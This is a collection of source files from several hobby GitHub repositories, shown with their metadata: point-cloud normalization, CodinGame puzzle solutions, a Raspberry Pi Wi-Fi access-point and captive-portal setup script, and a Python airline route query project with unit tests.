ValueError('ratio_type must be either \\'union\\', or \\'min\\'.')\n"
},
{
"alpha_fraction": 0.5670307874679565,
"alphanum_fraction": 0.6007944345474243,
"avg_line_length": 26.216217041015625,
"blob_id": "4e7f8a885a9de248f024c64c7d569f56b1072392",
"content_id": "3706d816129fad4fd550f900b9d690f6873ac203",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1007,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 37,
"path": "/point_clouds/normalizations.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 30, 2018\n\n@author: optas\n'''\n\nimport numpy as np\nfrom . point_cloud import Point_Cloud\n\n\ndef zero_mean_in_unit_sphere(in_pclouds):\n ''' Zero MEAN + Max_dist = 0.5\n '''\n pclouds = in_pclouds.copy()\n pclouds = pclouds - np.expand_dims(np.mean(pclouds, axis=1), 1)\n dist = np.max(np.sqrt(np.sum(pclouds ** 2, axis=2)), 1)\n dist = np.expand_dims(np.expand_dims(dist, 1), 2)\n pclouds = pclouds / (dist * 2.0)\n return pclouds\n\n\ndef center_in_unit_sphere(pclouds):\n for i, pc in enumerate(pclouds):\n pc, _ = Point_Cloud(pc).center_axis()\n pclouds[i] = pc.points\n\n dist = np.max(np.sqrt(np.sum(pclouds ** 2, axis=2)), 1)\n dist = np.expand_dims(np.expand_dims(dist, 1), 2)\n pclouds = pclouds / (dist * 2.0)\n\n for i, pc in enumerate(pclouds):\n pc, _ = Point_Cloud(pc).center_axis()\n pclouds[i] = pc.points\n\n dist = np.max(np.sqrt(np.sum(pclouds ** 2, axis=2)), 1)\n assert(np.all(abs(dist - 0.5) < 0.0001))\n return pclouds\n"
}
] | 31 |
folkol/codinggame
|
https://github.com/folkol/codinggame
|
b981721af508f32bf8d238e19cf04f15c7a9ba51
|
e68cbf54be9ef997a44a22f1f6a7a8894d593b02
|
e618115a5e852d089afaeaafcf8daa820938d68a
|
refs/heads/master
| 2020-04-17T07:01:17.489420 | 2016-05-10T21:51:08 | 2016-05-10T21:51:08 | 66,836,137 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4754420518875122,
"alphanum_fraction": 0.5068762302398682,
"avg_line_length": 24.399999618530273,
"blob_id": "54bdf002321292c74176c1220078931090a83558",
"content_id": "ab5a8ea380be32b4051a9b3bbd9db4199f8fa8f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 509,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 20,
"path": "/thor.py",
"repo_name": "folkol/codinggame",
"src_encoding": "UTF-8",
"text": "\ndirections = {\n (-1, -1): 'NW',\n (0, -1): 'N',\n (1, -1): 'NE',\n (1, 0): 'E',\n (1, 1): 'SE',\n (0, 1): 'S',\n (-1, 1): 'SW',\n (-1, 0): 'W'\n}\n\nlight_x, light_y, thor_x, thor_y = [int(i) for i in raw_input().split()]\n\nwhile True:\n remaining_turns = int(raw_input()) # The remaining amount of turns Thor can move. Do not remove this line.\n\n from numpy import sign\n dx, dy = sign(light_x - thor_x), sign(light_y - thor_y)\n print directions[(dx, dy)]\n thor_x, thor_y = dx, dy\n"
},
{
"alpha_fraction": 0.4369286894798279,
"alphanum_fraction": 0.44606947898864746,
"avg_line_length": 35.46666717529297,
"blob_id": "4957d73109328d1c2b84445d72b350ab74f6581d",
"content_id": "ffc528231d4a659d8ce22b7e38942e090bfd1f4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 547,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 15,
"path": "/glass_stacking.py",
"repo_name": "folkol/codinggame",
"src_encoding": "UTF-8",
"text": "def draw_stack(glasses_left, n=1, m=0):\n def draw(glasses, padding):\n print ' ' * padding + ' '.join([' *** '] * glasses) + ' ' * padding\n print ' ' * padding + ' '.join([' * * '] * glasses) + ' ' * padding\n print ' ' * padding + ' '.join([' * * '] * glasses) + ' ' * padding\n print ' ' * padding + ' '.join(['*****'] * glasses) + ' ' * padding\n\n if glasses_left >= n:\n m = draw_stack(glasses_left - n, n + 1, m)\n draw(m, n - 1)\n return m + 1\n\n\nN = int(raw_input())\ndraw_stack(N)\n"
}
] | 2 |
EduMake/rpi-ap
|
https://github.com/EduMake/rpi-ap
|
4389879c5dc6d5001b50b4df05226dbf9885819d
|
874c001184c4d8b4aedacc77a2a899bd2530692b
|
f63b5b4b1a8489c7bf146ac8038a297b21097b34
|
refs/heads/master
| 2021-01-10T17:11:43.637323 | 2015-12-05T10:46:00 | 2015-12-05T10:46:00 | 47,433,828 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7344674468040466,
"alphanum_fraction": 0.7588757276535034,
"avg_line_length": 49.03703689575195,
"blob_id": "d70d4919c06d1452fdf8bcb5f0963beb2f21dbc6",
"content_id": "fccb35bd52d15293bb88af193d01a3b95b2efab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1352,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 27,
"path": "/README.md",
"repo_name": "EduMake/rpi-ap",
"src_encoding": "UTF-8",
"text": "# rpi-ap\nRPi config for using rpi as an access point which uses capture portal techniques to give mobiles a web ui to physical computing projects. As setup it does not give internet access \n\n## Install the software\n\n```\nsudo aptitude install iw hostapd dnsmasq python-serial\n```\n\n* copy the files from the /file into the same position on the Pi (FIXME)\n* Use wpa_cli to add the networks you want (use 'save config' to store it)\n* In /etc/hostapd/hostapd.conf set ssid=EduMakeRPi to whatever you want to call your network\n* Set the SSIDs you would like it to try to connect to first in /etc/rc.local\n* It will scan for the network names in ssids= () and attach to one those if it can\n* If not it will setup an Access Point using 10.5.5.1 for the RPi and 10.5.5.100 -150 for the dhcp range\n\n* To set up a way physically force own AP (so you can force that behaviour even when at home base):-\n*\tWire GPIO 14 and 15 together \n*\tuse raspi-config -> Serial to Disable shell and kernel messages on the serial connection.\n* the code will check if the GPIO 14 and 15 are linked together (with a jumper / wire) and skip the searching if they are\n\n\n##Techniques based on\n\nhttp://www.penguintutor.com/news/raspberrypi/wireless-hotspot\n\nhttps://nims11.wordpress.com/2012/04/27/hostapd-the-linux-way-to-create-virtual-wifi-access-point/ using the dnsmasq version\n\n"
},
{
"alpha_fraction": 0.6892655491828918,
"alphanum_fraction": 0.709039568901062,
"avg_line_length": 27.280000686645508,
"blob_id": "3f7a2bbf51488ffa4e92d432069ea903c90ef87f",
"content_id": "23be347efce5df15ebbb2d41eb29ae64f27d5063",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 25,
"path": "/files/etc/serialtest.py",
"repo_name": "EduMake/rpi-ap",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport serial\nimport io\nimport sys\n\n#https://pyserial.readthedocs.org/en/latest/index.html\n\ntry:\n\tprint(\"Checking if GPIO 14 & 15 are connected\")\n\t#ser = serial.serial_for_url('loop://', timeout=1) #Tester\n\t\n\t#Standard UART on RPi: need to use raspi-config to disable bootup logging on SERIAL \n\tser = serial.serial_for_url('/dev/ttyAMA0', timeout=1) \n\tser.write(\"hello\\n\")\n\tser.flush() # it is buffering. required to get the data out *now*\n\thello = ser.readline()\n\tif(hello == \"hello\\n\"):\n\t\tprint(\"GPIO 14 & 15 are connected\")\n\t\tsys.exit(0)\n\telse:\n\t\tprint(\"Expected Message Not Received\")\n\t\tsys.exit(1)\nexcept serial.SerialException:\n\tprint(\"Serial Communication Failed\")\n\tsys.exit(1)\n\n"
},
{
"alpha_fraction": 0.6253955960273743,
"alphanum_fraction": 0.6534810066223145,
"avg_line_length": 30.600000381469727,
"blob_id": "6024ed32152c6ea0368e2c91fdf86313b03a60be",
"content_id": "2c9bac24b5afd85941ff95778dd316a305bc0290",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2528,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 80,
"path": "/files/etc/rc.local",
"repo_name": "EduMake/rpi-ap",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#\n# rc.local\n#\n\n# EduMake RPi Network Conf Bootstrapper\n# Will scan for the network names (ssids= () below) and attach to one those if it can\n# Will not be able to attach until those SSIDs are set up using wpa_cli (remember to save config)\n# If can't attach to WiFi it will generate its own AP using the SSID etc in /etc/hostapd/hostapd.conf\n# and the IP addressing etc in createNetwork() below\n# To set up a way physically force own AP (so you can force that behaviour even when at home base):-\n#\tWire GPIO 14 and 15 together \n#\tuse raspi-config -> Serial to Disable shell and kernel messages on the serial connection.\n# the code will check if the GPIO 14 and 15 are linked together (with a jumper / wire) and skip the searching if they are\n\nssids=( 'WiFi1' 'SSID2' )\n\ncreateNetwork(){\n echo \"Creating network using Own AP\"\n #Stop the vanilla dnsmasq that does nowt\n service dnsmasq stop\n #Turn WiFi dongle wlan0 off\n ifconfig wlan0 down\n\n\t#Turn WiFi dongle wlan0 back on a Fixed IP\n ifconfig wlan0 10.5.5.1 netmask 255.255.255.0 up\n \n #Turn on the Soft Access Point\n hostapd -B /etc/hostapd/hostapd.conf\n \n #Turn on DHCP and DNS redirecting : so all DNS based (web) traffic comes to the RPi\n sudo dnsmasq --interface=wlan0 --dhcp-range=10.5.5.100,10.5.5.150,255.255.255.0,12h --address=/#/10.5.5.1\n echo \"Network created\"\n}\n\necho \"=========================================\"\necho \"EduMake RPi Network Conf Bootstrapper 0.1\"\necho \"=========================================\"\n \nif /etc/serialtest.py ; then\n echo \"Jumper found - forcing Own AP\"\n ssids=( )\nelse\n echo \"Scanning for known WiFi networks\"\nfi\n\nconnected=false\nfor ssid in \"${ssids[@]}\"\ndo\n if iwlist wlan0 scan | grep $ssid > /dev/null\n then\n echo \"First WiFi in range has SSID:\" $ssid\n echo \"Starting supplicant for WPA/WPA2\"\n wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf > /dev/null 2>&1\n echo \"Obtaining IP from DHCP\"\n if dhclient -1 wlan0\n then\n echo \"Connected to WiFi\"\n connected=true\n break\n else\n echo \"DHCP server did not respond with an IP lease (DHCPOFFER)\"\n wpa_cli terminate\n break\n fi\n else\n echo \"Not in range, WiFi with SSID:\" $ssid\n fi\ndone\n \nif ! $connected; then\n createNetwork\nfi\n\n#Launch Web Server\n#For discover-ability make sure the the server responds to /success.txt with a start page\n\n#sudo /path/to/server &\n\nexit 0\n"
}
] | 3 |
weishi3/Airline_Query_Python
|
https://github.com/weishi3/Airline_Query_Python
|
3d7b228a8af5c23e3dbb24f7378cdde52907e481
|
b75fe88dde212d819d290da12ba81da4cb12c6f3
|
6d5125e42e73d7180809c99f319d727ec119007e
|
refs/heads/master
| 2021-01-11T00:09:27.199574 | 2016-10-12T22:23:28 | 2016-10-12T22:23:28 | 70,746,582 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5603756904602051,
"alphanum_fraction": 0.5629099607467651,
"avg_line_length": 27.299577713012695,
"blob_id": "8929b811f92904b93d7b200619bb49fe1e6d80a2",
"content_id": "60880a1429ccb94f149186df61ee9b6c60ce1490",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6708,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 237,
"path": "/CS242assignment2.1/implements/Query.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\n\nclass Query:\n\n\n\n\n def __init__(self, city_list, searchForCode):\n self.city_list = city_list\n self.searchForCode = searchForCode\n\n \"\"\"\n return all cities names for query\n \"\"\"\n\n #all city name:part 1\n def get_all_city(self):\n all_city = []\n for i in self.city_list:\n city = self.city_list[i]\n all_city.append(city.name)\n\n return all_city\n\n #basic queries:part2\n \"\"\"\n given the name of a city, get the city code\n \"\"\"\n def get_city_code(self, city_name):\n return self.searchForCode[city_name]\n\n\n \"\"\"\n return the country the given city_name belongs to\n \"\"\"\n def get_country(self, city_name):\n return self.city_list[self.searchForCode[city_name]].country\n\n \"\"\"\n return the continent the given city_name belongs to\n \"\"\"\n def get_continent(self, city_name):\n return self.city_list[self.searchForCode[city_name]].continent\n \"\"\"\n return the timezone the given city_name belongs to\n \"\"\"\n def get_timezone(self, city_name):\n return self.city_list[self.searchForCode[city_name]].timezone\n \"\"\"\n return the coordinate the given city_name belongs to\n \"\"\"\n def get_coordinates(self, city_name):\n return self.city_list[self.searchForCode[city_name]].coordinates\n \"\"\"\n return the population of the city with given city_name\n \"\"\"\n def get_population(self, city_name):\n return self.city_list[self.searchForCode[city_name]].population\n \"\"\"\n return the region of the city with given city_name\n \"\"\"\n def get_region(self, city_name):\n return self.city_list[self.searchForCode[city_name]].region\n\n\n \"\"\"\n return the deep copy of accessibleList of a city\n \"\"\"\n def get_accessible_list(self, city):\n accessible_list = city.accessibleList\n accessible_list_copy = []\n for i in accessible_list.keys():\n accessible_list_copy.append((self.city_list[i].name,accessible_list[i]))\n\n return accessible_list_copy\n\n \"\"\"\n return the tuple[from, to ,distance] of the longest flight\n \"\"\"\n def get_longest_flight(self):\n max_distance = 0\n the_flight = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n for code in city.accessibleList.keys():\n if city.accessibleList[code] > max_distance:\n max_distance = city.accessibleList[code]\n the_flight = [city.name, self.city_list[code].name, max_distance]\n\n return the_flight\n\n\n \"\"\"\n return the tuple[from, to ,distance] of the shortest flight\n \"\"\"\n def get_shortest_flight(self):\n min_distance = -1\n the_flight = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n for code in city.accessibleList:\n\n if min_distance == -1:\n min_distance = city.accessibleList[code]\n the_flight = [city.name, self.city_list[code].name, min_distance]\n elif city.accessibleList[code] < min_distance:\n min_distance = city.accessibleList[code]\n the_flight = [city.name, self.city_list[code].name, min_distance]\n\n return the_flight\n\n\n \"\"\"\n return the average distance of all flights\n \"\"\"\n def get_average_distance(self):\n whole = 0\n count = 0\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n for code in city.accessibleList.keys():\n whole += city.accessibleList[code]\n count += 1\n\n return whole / count\n\n \"\"\"\n return [city.name, population] of the largest city\n \"\"\"\n def get_biggest_city(self):\n population = 0\n biggest_city = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n if city.population > population:\n population = city.population\n biggest_city = [city.name, population]\n\n return biggest_city\n\n\n \"\"\"\n return [city.name, population] of the smallest city\n \"\"\"\n def get_smallest_city(self):\n population = -1\n smallest_city = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n if population == -1 or city.population < population:\n population = city.population\n smallest_city = [city.name, population]\n\n return smallest_city\n\n \"\"\"\n return the average population of all cities\n \"\"\"\n def get_average_size(self):\n whole = 0\n count = 0\n\n for i in self.city_list:\n city = self.city_list[i]\n whole += city.population\n count += 1\n\n return whole / count\n\n \"\"\"\n return a list of continents and the cities belonging to them\n \"\"\"\n def get_continent_list(self):\n continent_list = {}\n\n for i in self.city_list:\n city = self.city_list[i]\n if( not (city.continent in continent_list)):\n continent_list[city.continent] = [city.name]\n else:\n continent_list[city.continent].append(city.name)\n\n return continent_list\n \"\"\"\n The old version:\n def get_hub_city(self):\n city_list = []\n temp = 0\n for i in self.city_list:\n print(i)\n city = self.city_list[i]\n if len(city.accessibleList) > temp:\n city_list = [city.name]\n temp = len(city.accessibleList)\n elif len(city.accessibleList) == temp:\n city_list.append(city.name)\n\n return city_list\n\n \"\"\"\n\n\n \"\"\"\n return the cities with most connections\n \"\"\"\n def get_hub_city(self):\n city_list = []\n temp = {}\n for i in self.city_list:\n city = self.city_list[i]\n temp[city.name] = len(city.accessibleList)\n for i in self.city_list:\n for j in self.city_list[i].accessibleList:\n city = self.city_list[j]\n temp[city.name] += 1\n max_link = 0\n for i in temp:\n if temp[i] > max_link:\n city_list = [i]\n max_link = temp[i]\n elif temp[i] == max_link:\n city_list.append(i)\n return city_list\n\n"
},
{
"alpha_fraction": 0.6101058125495911,
"alphanum_fraction": 0.641515851020813,
"avg_line_length": 39.68055725097656,
"blob_id": "f693ce8474a463a9054127ed1d096b7b118ace64",
"content_id": "8d4aac018a1860249d3f6b05359be1116e662482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2929,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 72,
"path": "/CS242assignment2.1/tests/testForWAR3City.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\nimport unittest\n\nfrom implements import MyParser,Query,Edit\n\n\n\n\n# I build some virtual cities to test:\nclass MyTestCase(unittest.TestCase):\n\n def test_WAR3(self):\n #test parsers\n ui_parser = MyParser.MyParser(\"warcraft3_city.txt\")\n ui_parser.parse(\"init\")\n the_query = Query.Query(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n\n #note: i is the city name here\n for i in the_query.get_all_city():\n #test query helper function\n if the_query.get_city_code(i) == \"CAPH\":\n #test basic queries\n self.assertEqual(the_query.get_country(i), \"Human\")\n self.assertEqual(the_query.get_continent(i), \"Lordaeron\")\n self.assertEqual(the_query.get_timezone(i), -3)\n self.assertEqual(the_query.get_population(i), 60000000000)\n self.assertEqual(the_query.get_region(i), 1)\n j=the_query.get_accessible_list(ui_parser.code_indexed_cityList[ui_parser.searchForCode[i]])\n print j\n\n self.assertEqual(ui_parser.code_indexed_cityList[\"CAPU\"].name, \"UnderCity\")\n\n else:\n k=the_query.get_accessible_list(ui_parser.code_indexed_cityList[ui_parser.searchForCode[i]])\n print k\n\n self.assertEqual(the_query.get_region(i), 2)\n\n #test advance functions\n self.assertEqual(the_query.get_average_distance(),2453)\n self.assertEqual(the_query.get_smallest_city()[0],\"UnderCity\")\n #(4000000+6000000)/2=5000000\n self.assertEqual(the_query.get_average_size(), 30002000000)\n self.assertEqual(the_query.get_continent_list(), {u'Lordaeron': [u'UnderCity', u'Dalaran']})\n self.assertEqual(the_query.get_longest_flight(),the_query.get_shortest_flight())\n self.assertEqual(the_query.get_hub_city(),[u'UnderCity', u'Dalaran'])\n\n\n ui_parser.parse(\"myData.txt\")\n the_query = Query.Query(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n\n #no longer [u'UnderCity', u'Dalaran']\n self.assertEqual(the_query.get_hub_city(),[u'Istanbul', u'Hong Kong'])\n\n # but the biggest city is still the magic Dalaran\n self.assertEqual(the_query.get_biggest_city(),[u'Dalaran', 60000000000])\n\n # after Arthas coming\n Edit.change_population(ui_parser.code_indexed_cityList[ui_parser.searchForCode[u'Dalaran']],60)\n self.assertEqual(the_query.get_biggest_city(),[u'Tokyo', 34000000])\n\n Edit.add_route(ui_parser.code_indexed_cityList[\"PAR\"],\"CAPH\",1000000);\n self.assertEqual(ui_parser.code_indexed_cityList[\"PAR\"].accessibleList[\"CAPH\"],1000000)\n self.assertEqual(ui_parser.code_indexed_cityList[\"PAR\"].accessibleList[ui_parser.searchForCode[\"Essen\"]],433)\n\n\n\n ui_parser.save_disk(\"modifies_war.json\")\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6700507402420044,
"alphanum_fraction": 0.6707759499549866,
"avg_line_length": 64.66666412353516,
"blob_id": "eab8b78f437565b5c27f6786b75842bcf6b8bdac",
"content_id": "73ec6fc7dbff707569461a18d6563165d05c2839",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1379,
"license_type": "no_license",
"max_line_length": 908,
"num_lines": 21,
"path": "/CS242assignment2.1/tests/testforgraph.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\nimport unittest\n\nfrom implements import MyParser, UI_interface\nimport UI_interface\n\n\nclass MyTestCase(unittest.TestCase):\n #test for the given CSAIR DATA\n #test for correct url\n def test_option2(self):\n ui_parser = MyParser.MyParser(\"myData.txt\")\n ui_parser.parse()\n tester= UI_interface.openMap(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n\n self.assertEqual(tester,\"http://www.gcmap.com/mapui?P=PAR-ESS,+PAR-MIL,+MIL-ESS,+MIL-IST,+MIA-WAS,+CCU-HKG,+CCU-BKK,+LIM-MEX,+LIM-BOG,+ATL-MIA,+ATL-WAS,+PEK-ICN,+LON-NYC,+LON-PAR,+LON-ESS,+IST-BGW,+LOS-FIH,+LOS-KRT,+CAI-ALG,+CAI-RUH,+CAI-BGW,+CAI-IST,+DEL-CCU,+DEL-MAA,+DEL-BOM,+BOM-MAA,+BGW-KHI,+BGW-RUH,+BGW-THR,+NYC-YYZ,+BOG-MIA,+BOG-SAO,+BOG-BUE,+SCL-LIM,+SAO-LOS,+SAO-MAD,+SFO-CHI,+JKT-SYD,+BKK-JKT,+BKK-HKG,+BKK-SGN,+KHI-DEL,+KHI-BOM,+MNL-SFO,+MNL-SGN,+MNL-SYD,+SGN-JKT,+OSA-TPE,+HKG-SHA,+HKG-TPE,+HKG-MNL,+HKG-SGN,+BUE-SAO,+TPE-MNL,+ESS-LED,+ICN-TYO,+CHI-ATL,+CHI-YYZ,+THR-KHI,+THR-RUH,+THR-DEL,+KRT-CAI,+SHA-TPE,+SHA-TYO,+SHA-ICN,+SHA-PEK,+FIH-JNB,+FIH-KRT,+WAS-NYC,+WAS-YYZ,+RUH-KHI,+TYO-OSA,+TYO-SFO,+LED-MOW,+LED-IST,+SYD-LAX,+ALG-PAR,+ALG-MAD,+ALG-IST,+MOW-THR,+MOW-IST,+MAA-CCU,+MAA-JKT,+MAA-BKK,+JNB-KRT,+LAX-SFO,+LAX-CHI,+MAD-NYC,+MAD-PAR,+MAD-LON,+MEX-MIA,+MEX-CHI,+MEX-LAX,+MEX-BOG\")\n\n #test for\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5066381096839905,
"alphanum_fraction": 0.5280513763427734,
"avg_line_length": 25.827587127685547,
"blob_id": "286bcbd1f90dd4df83e3e2153c2aed7535ffeb93",
"content_id": "e213966469e4120c20bf68adf12302117637c1e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2335,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 87,
"path": "/CS242assignment2.1/implements/Shortest_route.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\nimport copy\n\nfrom implements import Query\n\n\n\"\"\"\na help function to print 16 cities in a line\n\"\"\"\ndef print_cities(city_list):\n cap = 16\n count = 0\n line = \"\"\n\n for city in city_list:\n line += city + \", \"\n count += 1\n if(count == cap):\n print(line)\n count = 0\n line = \"\"\n if line != \"\":\n print(line[:-2])\n\n\"\"\"\nfind the shortest path\n@param city_list : a code to city dictionary\n@param searchForCode: a name to code dictionary\nprint distance and the path in code\n\"\"\"\ndef findShortestRoute(city_list, searchForCode):\n \n query = Query.Query(city_list, searchForCode)\n start = \"\"\n end = \"\"\n \n print(\"City List:\")\n print_cities(query.get_all_city())\n valid_city = False\n while not valid_city:\n print(\"Select a city as the departure or press q to go back:\")\n start = raw_input()\n valid_city = start in searchForCode\n if start == \"q\":\n return\n \n valid_city = False\n while not valid_city:\n print(\"Select a city as the destination or press q to go back:\")\n end = raw_input()\n valid_city = end in searchForCode\n if start == \"q\":\n return\n start = searchForCode[start]\n end = searchForCode[end]\n\n\n dist={}\n dist[(start,start)]=0\n path={}\n for i in city_list:\n if i != start:\n dist[(start,i)]=99999999999999\n path[i]=[]\n S=[]\n path[start].append(start)\n for i in range(len(city_list)):\n temp=(99999999999999,\"\")\n for j in city_list:\n if j not in S:\n if dist[(start,j)]<temp[0]:\n temp=(dist[(start,j)],j)\n dist[(start,temp[1])] = temp[0]\n S.append(temp[1])\n #path[temp[1]].append(temp[1])\n if temp[1]!=\"\":\n for u in city_list[temp[1]].accessibleList:\n if dist[(start, u)]< (dist[(start, temp[1])] + city_list[temp[1]].accessibleList[u]):\n path[u] = path[u]\n else:\n path[u]=copy.deepcopy(path[temp[1]])\n path[u].append(u)\n dist[(start, u)] = min(dist[(start, u)], dist[(start, temp[1])] + city_list[temp[1]].accessibleList[u])\n\n\n print dist[(start, end)]\n print_cities(path[end])\n\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 21,
"blob_id": "5c4e27c7171c5fbd97be7bd87c30697fb2813cbd",
"content_id": "3ac3e7b5615e12bc2eff41db260434207028bdf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/CS242assignment2.1/implements/__init__.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n"
},
{
"alpha_fraction": 0.7140591740608215,
"alphanum_fraction": 0.7140591740608215,
"avg_line_length": 24.239999771118164,
"blob_id": "743975351be1587f6dd2aa4c3a7cdb25dfb67db0",
"content_id": "042d09af6f5740165d65da4451829d4e37e09b1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1892,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 75,
"path": "/CS242assignment2.1/implements/Edit.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\nimport City\n\"\"\"\nremove a city and related routes\n@:param city the city you want to delete\n\"\"\"\ndef remove_city(city, city_list, searchForCode):\n city_code = searchForCode[city]\n del city_list[city_code]\n\n #city_list is the dict type (code,city)\n for i in city_list.itervalues():\n if(city_code in i.accessibleList):\n del i.accessibleList[city_code]\n\n\ndef add_city(code, name, country, continent, timezone, coordinates, population, region,code_indexed_cityList,searchForCode,link):\n city = City.City(code, name, country, continent, timezone, coordinates, population, region)\n\n\n code_indexed_cityList[city.code] = city\n\n # translate: city name->city code\n searchForCode[city.name] = code\n\n for i in link:\n city.accessibleList[i]=link[i]\n\n'''\n@param from_city the city the route start from\n@param destination_code the city code of the route's destination\n'''\ndef remove_route(from_city, destination_code):\n del from_city.accessibleList[destination_code]\n\n'''\nGiven an Airport and the route information this will add the route into\nthe network.\n@param from_city the city the route start from\n@param destination_code the city code of the route's destination\n'''\ndef add_route(from_city, destination_code, distance):\n from_city.accessibleList[destination_code] = distance\n\n'''\nThis edits the city's Country\n\n'''\ndef change_country(city, country):\n city.country = country\n\n'''\nThis edits the city's Continent\n'''\ndef change_continent(city, continent):\n city.continent = continent\n\n'''\nThis edits the Airport's Timezone\n'''\ndef change_timezone(city, timezone):\n city.timezone = timezone\n\n'''\nThis edits the Airport's Region\n'''\ndef change_region(city, region):\n city.region = region\n\n'''\nThis edits the Airport's population\n'''\ndef change_population(city, population):\n city.population = population"
},
{
"alpha_fraction": 0.5453698039054871,
"alphanum_fraction": 0.5652579069137573,
"avg_line_length": 24.33070945739746,
"blob_id": "5d5003b1486ec4dace925061ca4091e8d0f5b8bf",
"content_id": "279fa0a0e8d9d29bdb0e0e47a9a6286ce072c77c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3218,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 127,
"path": "/CS242assignment2.1/implements/AboutRoute.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\nimport math\n\nfrom implements import Query\n\n\n\"\"\"\nprint the total distance, cost and time taken as\n@param city_list dictionary[code:city]\n@param searchForCode[city.name:code]\n\"\"\"\ndef routeInformation(city_list, searchForCode):\n query = Query.Query(city_list, searchForCode)\n\n print(\"City List:\")\n print_cities(query.get_all_city())\n valid = False\n while(not valid):\n print(\"Select a city as the departure or press q to go back:\")\n input = raw_input()\n valid = input in searchForCode\n if(input == \"q\"):\n return\n\n\n code = searchForCode[input]\n start_city = city_list[code]\n city = start_city\n airports = [code]\n legs = []\n\n while(True):\n output = \"\"\n for destination in city.accessibleList:\n output += destination + \", \"\n\n code = \"\"\n valid_code = False\n\n while(not valid_code):\n print(\"Please choose the next city or press 'return' button when you are done.\")\n print(output)\n code = raw_input()\n valid_code = (code in city.accessibleList) or (code == \"\")\n\n if(code == \"\"):\n break\n legs.append(city.accessibleList[code])\n airports.append(code)\n city = city_list[code]\n\n print(\"Total Distance = \" + str(calc_total_distance(legs)) )\n print(\"Total Cost = $\" + str(calc_total_cost(legs)))\n print(\"Total Time = \" + str(calc_total_time(legs, airports, city_list)) + \" hours\")\n\n\n\n\"\"\"\ncalculate total distance\n@param legs is a list of number which represent the distance for every leg of the journey\n\"\"\"\ndef calc_total_distance(legs):\n sum = 0\n for i in legs:\n sum += i\n return sum\n\ndef calc_total_cost(legs):\n cost = legs[0] * .35\n\n for i in range(1, len(legs)):\n temp = .35-.05*i\n if temp < 0:\n temp=0\n cost += legs[i] * temp\n\n return cost\n\n\n\"\"\"\n@param the list keeps the distance of each leg of journey\n@param airports is a list of city code on the trip\n@param city_list the code the city dictionary\n\"\"\"\ndef calc_total_time(legs, airports, city_list):\n totalTime = 0\n acceleration = 1406.25\n #750^2/2/200\n\n for i in range(len(legs)):\n if(legs[i] < 400):\n #x=0.5aT^2\n distance = legs[i]/2\n time = math.sqrt((2 * distance) / acceleration)\n totalTime += time * 2\n else:\n totalTime += math.sqrt((2 * 200) / acceleration)\n totalTime += math.sqrt((2 